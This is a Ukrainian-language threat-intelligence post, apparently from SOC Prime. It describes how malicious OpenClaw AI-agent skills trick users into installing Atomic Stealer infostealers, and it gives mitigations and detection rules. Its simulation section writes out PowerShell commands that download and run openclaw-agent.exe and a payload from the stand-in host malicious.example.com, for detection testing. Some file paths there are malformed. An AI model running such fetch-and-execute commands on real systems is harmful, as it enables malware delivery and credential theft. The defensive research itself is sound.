SOC Prime Bias: Критичний

04 Feb 2026 14:31 UTC

Від автоматизації до інфекції: Як навички AI-агента OpenClaw стають озброєннями

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Від автоматизації до інфекції: Як навички AI-агента OpenClaw стають озброєннями
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Стаття пояснює, як шкідливі навички OpenClaw використовуються як механізм доставки шкідливого програмного забезпечення для користувачів платформи самостійних агентів AI. Зловмисники публікують навички, які здаються нешкідливими, але в підсумку направляють жертв на завантаження та запуск бінарних файлів, контрольованих атакуючими, з зовнішніх джерел. Спостережені навантаження включають виконувані файли Windows та Mach-O файли для macOS, які були ідентифіковані як варіанти сімейства інформаційно-крадіжницьких програм Atomic Stealer. Ця діяльність вводить практичний ризик ланцюга постачання для особистих і розробницьких робочих станцій, що покладаються на навички, надані спільнотою.

Дослідження

VirusTotal Code Insight переглянув понад три тисячі навичок OpenClaw і виявив сотні, що демонстрували шкідливу або високоризикову поведінку. В одному з прикладів, навичка, завантажена користувачем hightower6eu, надавала покрокові інструкції щодо завантаження захищеного паролем ZIP-архіву з GitHub (пароль: openclaw) і виконання openclaw-agent.exe у Windows. На macOS та ж сама навичка спрямувала користувачів на отримання коду, закодованого в Base64, з glot.io, який потім завантажував виконуваний файл Mach-O для виконання. Отримані бінарні файли були виявлені кількома системами безпеки як троянські інформаційно-крадіжницькі програми.

Пом’якшення

Ставтеся до репозиторіїв навичок як до неперевіреного коду і запускайте OpenClaw в ізольованому або суворо обмеженому середовищі. Уникайте копіювання команд із описів навичок і не запускайте бінарні файли, отримані з невірогідних зовнішніх посилань. Для ринкових і спільнотних операторів, впроваджуйте сканування під час публікації, зосереджене на поведінці віддаленого завантаження, обфускованій логіці скриптів і індикаторах крадіжки облікових даних або ексфільтрації даних. У корпоративних налаштуваннях, навчайте користувачів про ризики установки навичок, розроблених спільнотою, і вимагаєте перевірки перед використанням.

Відповідь

Полюйте на пакети навичок OpenClaw, які містять зовнішні завантажувальні URL-адреси, архіви, захищені паролем, або кодовані командні стажери. Попереджайте про виконання невідомих бінарних файлів під назвою openclaw-agent.exe і про підозрілі запуски Mach-O, що слідують за завантаженнями, що скриптуються. Блокуйте підключення до відомих шкідливих доменів і ізолюйте уражені системи для судово-медичної експертизи, щоб підтвердити, чи мало місце виконання інформаційно-крадіжницького програмного забезпечення і викриття облікових даних.

Потік Атаки

Виявлення

Можлива маніпуляція рядками, закодованими в Base64 [MacOS] (через командний рядок)

Команда SOC Prime
03 Лютого 2026

Спроба підозрілого виконання Curl [MacOS] (через командний рядок)

Команда SOC Prime
03 Лютого 2026

Атрибути тимчасової папки MacOS Xattr були очищені (через створення процесу)

Команда SOC Prime
03 Лютого 2026

Можливе впровадження/викрадання даних/C2 через сторонні служби/інструменти (через проксі)

Команда SOC Prime
03 Лютого 2026

Можливе впровадження/викрадання даних/C2 через сторонні служби/інструменти (через DNS)

Команда SOC Prime
03 Лютого 2026

Ідентифікатори загроз (HashSha256) для виявлення: Від автоматизації до зараження: Як навички OpenClaw AI Agent використовуються як зброя

Правила SOC Prime AI
03 Лютого 2026

Виконання шкідливих навантажень через навички OpenClaw [Створення процесу Linux]

Правила SOC Prime AI
03 Лютого 2026

Виявлення шкідливого виконання агента OpenClaw [Створення процесу Windows]

Правила SOC Prime AI
03 Лютого 2026

Виконання симуляції

Передумова: Перевірка телеметрії та базовий тест перед польотом повинні бути пройдені.

Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та сценарій ПОВИННІ безпосередньо відображати виявлені TTP та прагнуть генерувати точну телеметрію, яка очікується від логіки виявлення.

  • Сценарій атаки та команди:
    Атакуючий отримав початковий доступ до робочої станції жертви та скинув шкідливий бінарний файл openclaw-agent.exe у тимчасовий директорій користувача. Бінарний файл виконується з командного рядка, який явно містить ключові слова завантажити and виконати щоб завантажити додаткові навантаження з ненадійного C2-сервера і запустити їх у пам’яті. Атакуючий використовує стандартний командний рядок Windows, щоб уникнути специфічних для PowerShell виявлень, тим самим співпадаючи з очікуваннями правила Sigma.

    1. Скиньте навантаження:
      $malPath = "$env:TEMPopenclaw-agent.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath
    2. Виконуйте з підозрілими аргументами:
      "%TEMP%openclaw-agent.exe" download http://malicious.example.com/payload.bin execute
    3. Агент контактує з C2-сервером, завантажує payload.bin, записує його на диск і запускає, все ще використовуючи оригінальну команду процесу, що містить тригерні слова.
  • Сценарій регресійного тесту:

    # -----------------------------------------------------------------------
    # Імітація виконання агента OpenClaw – запускає виявлення Sigma
    # -----------------------------------------------------------------------
    # 1. Завантажте шкідливий агент (імітується безпечним файлом)
    $agentUrl   = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi"  # заповнювач безпечного файлу
    $agentPath  = "$env:TEMPopenclaw-agent.exe"
    Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath
    
    # 2. Виконайте агента з очікуваними ключовими словами командного рядка
    $cmd = "`"$agentPath`" download http://malicious.example.com/payload.bin execute"
    Write-Host "Виконання: $cmd"
    Start-Process -FilePath $agentPath -ArgumentList "download http://malicious.example.com/payload.bin execute" -NoNewWindow -Wait
    
    # 3. Додатково: Імітуйте завантаження навантаження (безпечний стуб)
    $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md"
    $payloadPath = "$env:TEMPpayload.bin"
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath
    
    Write-Host "Імітація завершена. Перевірте SIEM для виявлення."
  • Команди очистки:

    # Видаліть всі артефакти, створені під час імітації
    $paths = @(
        "$env:TEMPopenclaw-agent.exe",
        "$env:TEMPpayload.bin"
    )
    foreach ($p in $paths) {
        if (Test-Path $p) {
            Remove-Item -Path $p -Force
            Write-Host "Видалено $p"
        }
    }